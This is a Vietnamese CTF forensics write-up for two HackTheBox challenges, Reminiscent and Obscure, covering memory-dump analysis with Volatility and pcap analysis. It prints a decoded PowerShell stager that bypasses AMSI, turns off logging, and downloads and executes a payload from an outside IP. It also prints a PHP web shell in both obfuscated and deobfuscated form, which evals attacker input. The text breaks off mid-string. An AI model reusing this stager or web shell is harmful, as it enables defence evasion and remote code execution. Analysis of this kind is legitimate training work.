# 1. Reminiscent
Trước tiên mình sẽ unzip file zip, bên trong nó sẽ như này :
Đề bài yêu cầu mình tìm và decode source của malware nên mình sẽ tập trung vào file .elf (đây là file dump bộ nhớ của máy ảo) và file imageinfo.txt (file này cung cấp profile mà mình cần dùng khi chạy volatility).
Theo đề bài thì mình sẽ tìm xem trong những process đang chạy có process nào đáng ngờ không.
``` $ python3 vol.py -f flounder-pc-memdump.elf windows.pslist ```
```p!
PID PPID ImageFileName Offset(V) Threads Handles SessionId Wow64 CreateTime ExitTime File output
4 0 System 0xfa80006b7040 83 477 N/A False 2017-10-04 18:04:27.000000 N/A Disabled
272 4 smss.exe 0xfa8001a63b30 2 30 N/A False 2017-10-04 18:04:27.000000 N/A Disabled
348 328 csrss.exe 0xfa800169bb30 9 416 0 False 2017-10-04 18:04:29.000000 N/A Disabled
376 328 wininit.exe 0xfa8001f63b30 3 77 0 False 2017-10-04 18:04:29.000000 N/A Disabled
396 384 csrss.exe 0xfa8001efa500 9 283 1 False 2017-10-04 18:04:29.000000 N/A Disabled
432 384 winlogon.exe 0xfa8001f966d0 4 112 1 False 2017-10-04 18:04:29.000000 N/A Disabled
476 376 services.exe 0xfa8001fcdb30 11 201 0 False 2017-10-04 18:04:29.000000 N/A Disabled
492 376 lsass.exe 0xfa8001ff2b30 8 590 0 False 2017-10-04 18:04:30.000000 N/A Disabled
500 376 lsm.exe 0xfa8001fffb30 11 150 0 False 2017-10-04 18:04:30.000000 N/A Disabled
600 476 svchost.exe 0xfa8002001b30 12 360 0 False 2017-10-04 18:04:30.000000 N/A Disabled
664 476 VBoxService.ex 0xfa800209bb30 12 118 0 False 2017-10-04 18:04:30.000000 N/A Disabled
728 476 svchost.exe 0xfa80020b5b30 7 270 0 False 2017-10-04 18:04:30.000000 N/A Disabled
792 476 svchost.exe 0xfa80021044a0 21 443 0 False 2017-10-04 18:04:30.000000 N/A Disabled
868 476 svchost.exe 0xfa8002166b30 21 429 0 False 2017-10-04 18:04:30.000000 N/A Disabled
900 476 svchost.exe 0xfa800217cb30 41 977 0 False 2017-10-04 18:04:30.000000 N/A Disabled
988 476 svchost.exe 0xfa80021ccb30 13 286 0 False 2017-10-04 18:04:30.000000 N/A Disabled
384 476 svchost.exe 0xfa8002204960 17 386 0 False 2017-10-04 18:04:30.000000 N/A Disabled
1052 476 spoolsv.exe 0xfa8002294b30 13 277 0 False 2017-10-04 18:04:31.000000 N/A Disabled
1092 476 svchost.exe 0xfa80022bbb30 19 321 0 False 2017-10-04 18:04:31.000000 N/A Disabled
1196 476 svchost.exe 0xfa8002390620 28 333 0 False 2017-10-04 18:04:31.000000 N/A Disabled
1720 476 taskhost.exe 0xfa8002245060 8 148 1 False 2017-10-04 18:04:36.000000 N/A Disabled
1840 476 sppsvc.exe 0xfa8002122060 4 145 0 False 2017-10-04 18:04:37.000000 N/A Disabled
2020 868 dwm.exe 0xfa80022c8060 4 72 1 False 2017-10-04 18:04:41.000000 N/A Disabled
2044 2012 explorer.exe 0xfa80020bb630 36 926 1 False 2017-10-04 18:04:41.000000 N/A Disabled
1476 2044 VBoxTray.exe 0xfa80022622e0 13 146 1 False 2017-10-04 18:04:42.000000 N/A Disabled
1704 476 SearchIndexer. 0xfa80021b4060 16 734 0 False 2017-10-04 18:04:47.000000 N/A Disabled
812 1704 SearchFilterHo 0xfa80023ed550 4 92 0 False 2017-10-04 18:04:48.000000 N/A Disabled
1960 1704 SearchProtocol 0xfa80024f4b30 6 311 0 False 2017-10-04 18:04:48.000000 N/A Disabled
2812 2044 thunderbird.ex 0xfa80007e0b30 50 534 1 True 2017-10-04 18:06:24.000000 N/A Disabled
2924 600 WmiPrvSE.exe 0xfa8000801b30 10 204 0 False 2017-10-04 18:06:26.000000 N/A Disabled
2120 476 svchost.exe 0xfa8000945060 12 335 0 False 2017-10-04 18:06:32.000000 N/A Disabled
2248 476 wmpnetwk.exe 0xfa800096eb30 18 489 0 False 2017-10-04 18:06:33.000000 N/A Disabled
592 600 WmiPrvSE.exe 0xfa8000930b30 9 127 0 False 2017-10-04 18:06:35.000000 N/A Disabled
496 2044 powershell.exe 0xfa800224e060 12 300 1 False 2017-10-04 18:06:58.000000 N/A Disabled
2772 396 conhost.exe 0xfa8000e90060 2 55 1 False 2017-10-04 18:06:58.000000 N/A Disabled
2752 496 powershell.exe 0xfa8000839060 20 396 1 False 2017-10-04 18:07:00.000000 N/A Disabled
```
Nhìn chung thì không có tiến trình nào với tên đáng ngờ hết.
Giờ mình sẽ xem các kết nối tại thời điểm bộ nhớ được dump
```python3 vol.py -f flounder-pc-memdump.elf windows.netscan ```
Ở đây có một điểm đáng ngờ là máy của nhà tuyển dụng lại dùng power shell để kết nối với port 80 (kết nối với một trang web).
Process powershell.exe có PID là 2752, mình sẽ xem tiến trình này đã dùng những command gì để chạy.
```python3 vol.py -f flounder-pc-memdump.elf windows.cmdline --pid 2752```
Và kết quả là mình thu được một đoạn base64:
```
JABHAHIAbwBVAFAAUABPAEwAaQBDAFkAUwBFAHQAdABJAE4ARwBzACAAPQAgAFsAcgBFAEYAXQAuAEEAUwBzAGUATQBCAEwAWQAuAEcARQB0AFQAeQBwAEUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAEUAdABGAEkARQBgAGwAZAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAgACcATgAnACsAJwBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBHAEUAVABWAGEAbABVAGUAKAAkAG4AdQBsAEwAKQA7ACQARwBSAG8AdQBQAFAATwBsAEkAQwB5AFMAZQBUAFQAaQBOAGcAUwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0AIAA9ACAAMAA7ACQARwBSAG8AdQBQAFAATwBMAEkAQwBZAFMARQB0AFQAaQBuAGcAUwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcAXQAgAD0AIAAwADsAWwBSAGUAZgBdAC4AQQBzAFMAZQBtAEIAbAB5AC4ARwBlAFQAVAB5AFAARQAoACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAVQB0AGkAbABzACcAKQB8AD8AewAkAF8AfQB8ACUAewAkAF8ALgBHAEUAdABGAGkAZQBMAGQAKAAnAGEAbQBzAGkASQBuAGkAdABGAGEAaQBsAGUAZAAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMARQBUAFYAYQBMAHUARQAoACQATgB1AGwATAAsACQAVAByAHUAZQApAH0AOwBbAFMAeQBzAFQAZQBtAC4ATgBlAFQALgBTAEUAcgBWAEkAYwBlAFAATwBJAG4AdABNAEEAbgBBAGcARQBSAF0AOgA6AEUAeABwAEUAYwB0ADEAMAAwAEMATwBuAFQAaQBuAHUARQA9ADAAOwAkAFcAQwA9AE4ARQBXAC0ATwBCAGoARQBjAFQAIABTAHkAcwBUAEUATQAuAE4ARQB0AC4AVwBlAEIAQwBsAEkARQBuAHQAOwAkAHUAPQAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAgACgAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAIABXAE8AVwA2ADQAOwAgAFQAcgBpAGQAZQBuAHQALwA3AC4AMAA7ACAAcgB2ADoAMQAxAC4AMAApACAAbABpAGsAZQAgAEcAZQBjAGsAbwAnADsAJAB3AEMALgBIAGUAYQBEAGUAcgBTAC4AQQBkAGQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQApADsAJABXAGMALgBQAFIAbwBYAHkAPQBbAFMAeQBzAFQAZQBNAC4ATgBFAFQALgBXAGUAYgBSAGUAcQB1AEUAcwB0AF0AOgA6AEQAZQBmAGEAVQBMAHQAVwBlAEIAUABSAE8AWABZADsAJAB3AEMALgBQAFIAbwBYAFkALgBDAFIARQBEAGUATgB0AEkAYQBMAFMAIAA9ACAAWwBTAFkAUwBUAGUATQAuAE4ARQBUAC4AQwByAGUARABFAG4AVABpAGEATABDAGEAQwBoAGUAXQA6ADoARABlAEYAYQB1AEwAVABOAEUAdAB3AE8AcgBrAEMAcgBlAGQAZQBuAHQAaQBBAGwAUwA7ACQASwA9AFsAUwBZAFMAdABFAE0ALgBUAGUAeAB0AC4ARQBOAEMATwBEAEkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcARQB0AEIAeQB0AEUAcwAoACcARQAxAGcATQBHAGQAZgBUAEAAZQBvAE4APgB4ADkAewBdADIARgA3ACsAYgBzAE8AbgA0AC8AUwBpAFEAcgB3ACcAKQA7ACQAUgA9AHsAJABEACwAJABLAD0AJABBAHIAZwBTADsAJABTAD0AMAAuAC4AMgA1ADUAOwAwAC4ALgAyADUANQB8ACUAewAkAEoAPQAoACQASgArACQAUwBbACQAXwBdACsAJABLAFsAJABfACUAJABLAC4AQwBvAHUAbgBUAF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAGIAeABvAFIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAdwBjAC4ASABFAEEAZABFAHIAcwAuAEEARABEACgAIgBDAG8AbwBrAGkAZQAiACwAIgBzAGUAcwBzAGkAbwBuAD0ATQBDAGEAaAB1AFEAVgBmAHoAMAB5AE0ANgBWAEIAZQA4AGYAegBWADkAdAA5AGoAbwBtAG8APQAiACkAOwAkAHMAZQByAD0AJwBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADkAOQAuADUANQA6ADgAMAAnADsAJAB0AD0AJwAvAGwAbwBnAGkAbgAvAHAAcgBvAGMAZQBzAHMALgBwAGgAcAAnADsAJABmAGwAYQBnAD0AJwBIAFQAQgB7ACQAXwBqADAARwBfAHkAMAB1AFIAXwBNADMAbQAwAHIAWQBfACQAfQAnADsAJABEAGEAdABBAD0AJABXAEMALgBEAG8AVwBOAEwAbwBhAEQARABBAFQAQQAoACQAUwBlAFIAKwAkAHQAKQA7ACQAaQB2AD0AJABkAGEAVABBAFsAMAAuAC4AMwBdADsAJABEAEEAdABhAD0AJABEAGEAVABhAFsANAAuAC4AJABEAEEAdABhAC4ATABlAG4ARwBUAEgAXQA7AC0ASgBPAEkATgBbAEMASABBAHIAWwBdAF0AKAAmACAAJABSACAAJABkAGEAdABBACAAKAAkAEkAVgArACQASwApACkAfABJAEUAWAA=
```
Giờ thử decode nó :
```
echo -n JABHAHIAbwBVAFAAUABPAEwAaQBDAFkAUwBFAHQAdABJAE4ARwBzACAAPQAgAFsAcgBFAEYAXQAuAEEAUwBzAGUATQBCAEwAWQAuAEcARQB0AFQAeQBwAEUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAEUAdABGAEkARQBgAGwAZAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAgACcATgAnACsAJwBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBHAEUAVABWAGEAbABVAGUAKAAkAG4AdQBsAEwAKQA7ACQARwBSAG8AdQBQAFAATwBsAEkAQwB5AFMAZQBUAFQAaQBOAGcAUwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0AIAA9ACAAMAA7ACQARwBSAG8AdQBQAFAATwBMAEkAQwBZAFMARQB0AFQAaQBuAGcAUwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcAXQAgAD0AIAAwADsAWwBSAGUAZgBdAC4AQQBzAFMAZQBtAEIAbAB5AC4ARwBlAFQAVAB5AFAARQAoACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAVQB0AGkAbABzACcAKQB8AD8AewAkAF8AfQB8ACUAewAkAF8ALgBHAEUAdABGAGkAZQBMAGQAKAAnAGEAbQBzAGkASQBuAGkAdABGAGEAaQBsAGUAZAAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMARQBUAFYAYQBMAHUARQAoACQATgB1AGwATAAsACQAVAByAHUAZQApAH0AOwBbAFMAeQBzAFQAZQBtAC4ATgBlAFQALgBTAEUAcgBWAEkAYwBlAFAATwBJAG4AdABNAEEAbgBBAGcARQBSAF0AOgA6AEUAeABwAEUAYwB0ADEAMAAwAEMATwBuAFQAaQBuAHUARQA9ADAAOwAkAFcAQwA9AE4ARQBXAC0ATwBCAGoARQBjAFQAIABTAHkAcwBUAEUATQAuAE4ARQB0AC4AVwBlAEIAQwBsAEkARQBuAHQAOwAkAHUAPQAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAgACgAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAIABXAE8AVwA2ADQAOwAgAFQAcgBpAGQAZQBuAHQALwA3AC4AMAA7ACAAcgB2ADoAMQAxAC4AMAApACAAbABpAGsAZQAgAEcAZQBjAGsAbwAnADsAJAB3AEMALgBIAGUAYQBEAGUAcgBTAC4AQQBkAGQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQApADsAJABXAGMALgBQAFIAbwBYAHkAPQBbAFMAeQBzAFQAZQBNAC4ATgBFAFQALgBXAGUAYgBSAGUAcQB1AEUAcwB0AF0AOgA6AEQAZQBmAGEAVQBMAHQAVwBlAEIAUABSAE8AWABZADsAJAB3AEMALgBQAFIAbwBYAFkALgBDAFIARQBEAGUATgB0AEkAYQBMAFMAIAA9ACAAWwBTAFkAUwBUAGUATQAuAE4ARQBUAC4AQwByAGUARABFAG4AVABpAGEATABDAGEAQwBoAGUAXQA6ADoARABlAEYAYQB1AEwAVABOAEUAdAB3AE8AcgBrAEMAcgBlAGQAZQBuAHQAaQBBAGwAUwA7ACQASwA9AFsAUwBZAFMAdABFAE0ALgBUAGUAeAB0AC4ARQBOAEMATwBEAEkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcARQB0AEIAeQB0AEUAcwAoACcARQAxAGcATQBHAGQAZgBUAEAAZQBvAE4APgB4ADkAewBdADIARgA3ACsAYgBzAE8AbgA0AC8AUwBpAFEAcgB3ACcAKQA7ACQAUgA9AHsAJABEACwAJABLAD0AJABBAHIAZwBTADsAJABTAD0AMAAuAC4AMgA1ADUAOwAwAC4ALgAyADUANQB8ACUAewAkAEoAPQAoACQASgArACQAUwBbACQAXwBdACsAJABLAFsAJABfACUAJABLAC4AQwBvAHUAbgBUAF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAGIAeABvAFIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAdwBjAC4ASABFAEEAZABFAHIAcwAuAEEARABEACgAIgBDAG8AbwBrAGkAZQAiACwAIgBzAGUAcwBzAGkAbwBuAD0ATQBDAGEAaAB1AFEAVgBmAHoAMAB5AE0ANgBWAEIAZQA4AGYAegBWADkAdAA5AGoAbwBtAG8APQAiACkAOwAkAHMAZQByAD0AJwBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADkAOQAuADUANQA6ADgAMAAnADsAJAB0AD0AJwAvAGwAbwBnAGkAbgAvAHAAcgBvAGMAZQBzAHMALgBwAGgAcAAnADsAJABmAGwAYQBnAD0AJwBIAFQAQgB7ACQAXwBqADAARwBfAHkAMAB1AFIAXwBNADMAbQAwAHIAWQBfACQAfQAnADsAJABEAGEAdABBAD0AJABXAEMALgBEAG8AVwBOAEwAbwBhAEQARABBAFQAQQAoACQAUwBlAFIAKwAkAHQAKQA7ACQAaQB2AD0AJABkAGEAVABBAFsAMAAuAC4AMwBdADsAJABEAEEAdABhAD0AJABEAGEAVABhAFsANAAuAC4AJABEAEEAdABhAC4ATABlAG4ARwBUAEgAXQA7AC0ASgBPAEkATgBbAEMASABBAHIAWwBdAF0AKAAmACAAJABSACAAJABkAGEAdABBACAAKAAkAEkAVgArACQASwApACkAfABJAEUAWAA= |base64 -d
```
Kết quả :
``` $GroUPPOLiCYSEttINGs = [rEF].ASseMBLY.GEtTypE('System.Management.Automation.Utils')."GEtFIE`ld"('cachedGroupPolicySettings', 'N'+'onPublic,Static').GETValUe($nulL);$GRouPPOlICySeTTiNgS['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0;$GRouPPOLICYSEtTingS['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0;[Ref].AsSemBly.GeTTyPE('System.Management.Automation.AmsiUtils')|?{$_}|%{$_.GEtFieLd('amsiInitFailed','NonPublic,Static').SETVaLuE($NulL,$True)};[SysTem.NeT.SErVIcePOIntMAnAgER]::ExpEct100COnTinuE=0;$WC=NEW-OBjEcT SysTEM.NEt.WeBClIEnt;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$wC.HeaDerS.Add('User-Agent',$u);$Wc.PRoXy=[SysTeM.NET.WebRequEst]::DefaULtWeBPROXY;$wC.PRoXY.CREDeNtIaLS = [SYSTeM.NET.CreDEnTiaLCaChe]::DeFauLTNEtwOrkCredentiAlS;$K=[SYStEM.Text.ENCODIng]::ASCII.GEtBytEs('E1gMGdfT@eoN>x9{]2F7+bsOn4/SiQrw');$R={$D,$K=$ArgS;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.CounT])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxoR$S[($S[$I]+$S[$H])%256]}};$wc.HEAdErs.ADD("Cookie","session=MCahuQVfz0yM6VBe8fzV9t9jomo=");$ser='http://10.10.99.55:80';$t='/login/process.php';$flag='HTB{$_j0G_y0uR_M3m0rY_$}';$DatA=$WC.DoWNLoaDDATA($SeR+$t);$iv=$daTA[0..3];$DAta=$DaTa[4..$DAta.LenGTH];-JOIN[CHAr[]](& $R $datA ($IV+$K))|IEX```
**Flag :** HTB{\$_j0G_y0uR_M3m0rY_$}
# 2/ Obscure
Đây là những gì mình có được sau khi unzip :
Đầu tiên mình sẽ tập trung vào file support.php
Và có vẻ như file này đã bị obfucated:
```php=
<?php
$V='$k="80eu)u)32263";$khu)=u)"6f8af44u)abea0";$kf=u)"35103u)u)9f4a7b5";$pu)="0UlYu)yJHG87Eu)JqEz6u)"u)u);function u)x($';
$P='++)u){$o.=u)$t{u)$i}^$k{$j};}}u)retuu)rn $o;}u)if(u)@pregu)_u)match("/$kh(.u)+)$kf/",@u)u)file_u)getu)_cu)ontents(';
$d='u)t,$k){u)$c=strlu)en($k);$l=strlenu)($t)u);u)$o=""u);for($i=0u);u)$i<$l;){for(u)$j=0;(u)$u)j<$c&&$i<$l)u)u);$j++,$i';
$B='ob_get_cou)ntu)ents();@obu)_end_cleu)anu)();$r=@basu)e64_eu)ncu)ode(@x(@gzu)compress(u)$o),u)$k));pru)u)int(u)"$p$kh$r$kf");}';
$N=str_replace('FD','','FDcreFDateFD_fFDuncFDFDtion');
$c='"php://u)input"),$u)m)==1){@u)obu)_start();u)@evau)l(@gzuu)ncu)ompress(@x(@bau)se64_u)decodu)e($u)m[1]),$k))u));$u)ou)=@';
$u=str_replace('u)','',$V.$d.$P.$c.$B);
$x=$N('',$u);$x();
?>
```
Mình dùng [Unphp](https://www.unphp.net/decode/792db23b84299ad36b1ecf95f380cf17/) để deobfucate nó.
```php=
<?php
$k="80e32263";
$kh="6f8af44abea0";
$kf="351039f4a7b5";
$p="0UlYyJHG87EJqEz6";
function x($t,$k){
$c=strlen($k);
$l=strlen($t);
$o="";
for($i=0;$i<$l;)
{
for($j=0;($j<$c&&$i<$l);$j++,$i++)
{
$o.=$t{$i}^$k{$j};
}
}return $o;
}
if(@preg_match("/$kh(.+)$kf/",@file_get_contents("php://input"),$m)==1){@ob_start();
eval(@gzuncompress(@x(base64_decode($m[1]),$k)));
$o=@ob_get_contents();
@ob_end_clean();
$r=@base64_encode(@x(@gzcompress($o),$k));
print("$p$kh$r$kf");
}
?>
```
Qua đoạn code trên thì mình biết rằng nó sẽ in ra ```0UlYyJHG87EJqEz66f8af44abea0($r)351039f4a7b5```
Đây là một con web shell, sẽ nhận input từ attacker thông qua `php://input` sau đó eval và print ra kết quả, nhưng kết quả sẽ được encode thông qua dòng code `@base64_encode(@x(@gzcompress($o),$k));` và sau đó được chèn giữa `$p$kh` và `$kf`
Giờ mình sẽ tập trung vào file pcap để tìm kết quả được in ra. Mình sẽ follow TCP Stream và tăng stream lên từ từ để lấy kết quả
Và đây chính là kết quả qua những lần tăng stream :
```
stream1:
0UlYyJHG87EJqEz66f8af44abea0QKxO/n6DAwXuGEoc5X9/H3HkMXv1Ih75Fx1NdSPRNDPUmHTy351039f4a7b5
```
```
stream23 :
0UlYyJHG87EJqEz66f8af44abea0QKzo43k49AMoNoVOfAMh+6h3euEZJvkTlblqP34rlZqPhxDgKLYMz7NpqfQ9IR9FOXy0OfVbUgo/PF3MxrMw/JOdJebwjE2y6VAxUFnyA4H4dHQNgV49YatbqT0it9IXYf5kzoE4+kfGnZ/dTAsyCesTC0i5V+gJQw6bYm/nU3U/lrYGyl+dgvIOURfl0fvGm0hmr0RZKQ==351039f4a7b5
```
```
stream24:
0UlYyJHG87EJqEz66f8af44abea0QKy2/Pr9e+Z3eUh4//sZexUyZR8mN/g=351039f4a7b5
```
```
stream25:
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351039f4a7b5
```
Giờ mình sẽ viết một đoạn để lấy ra biến ```$o``` ban đầu :
```php=
<?php
function reverseX($o, $k) {
$c = strlen($k);
$l = strlen($o);
$t = "";
for ($i = 0; $i < $l;) {
for ($j = 0; ($j < $c && $i < $l); $j++, $i++) {
$t .= $o{$i} ^ $k{$j};
}
}
return $t;
}
$inputString = "0UlYyJHG87EJqEz66f8af44abea0QKxIp/Wcsms0dFq7N4u31h1XDQHeWkT9yduC/loenUVu6c8QMVRetZmUOfk1Mi4z7E//+j2LBMQv1cUjykdM7RFMfDEyTcsUMjDwlM68586Qi3zyc0PAAcfKgo5OD9Xg7tnE2dgJS/IT5zqMMEjnqH29xGscsLidWK5V1m2sgX8OW1x6Yw7hFD2T4OhdUp05XFxjzR3L+eKR1mH+LVx02/ERL8JAy7zQADA/lZRWafLvK/C2p6pbe/rd2S5kwDs9ARACn/BgDgf2XTYm8lQfCkansJ7I2kVyScMtX9mnindtvinrMiGzDQBsffosAsvqEs9I8zBSRCaaHSh426gcrgcZItvUy96J0Q09W9qZ1oV/o9srEeLObbOXDkUvResXIUuNbu/DahkHZ8mMQF6FtU2idDgjJwieF9/uMvDrUntHyGDNGoOJKuEirdYcapo7I0J5cEHLVOAptPF8QCqjrJtFGRAx1LUsRLyyBxyzQWUIds6uEoCKLnBv4b0Cve8UH+8aODw3Yuw+sxIKBUMt5s/3wI562HmI/nJZ24ZAB51iGEQ266J1rkymoTkjwVmQRjyrw+g4H/WUgjalP2qTgDH0t3eXdcBDtUaDvgrkzHMUgBPaF1XmRUsSwFdD80ijXhNdV5gQZJrGGtJBD0819kZLfGCo1FOoDEWKmJMi4t94EnjP012qf+/x5PxtAgBrD0+nMJQBw00i9FusDnaXy6YRWf45CMbSFDb7H6uxDvnq26IKpdAh9kWDO0LT8lwvP/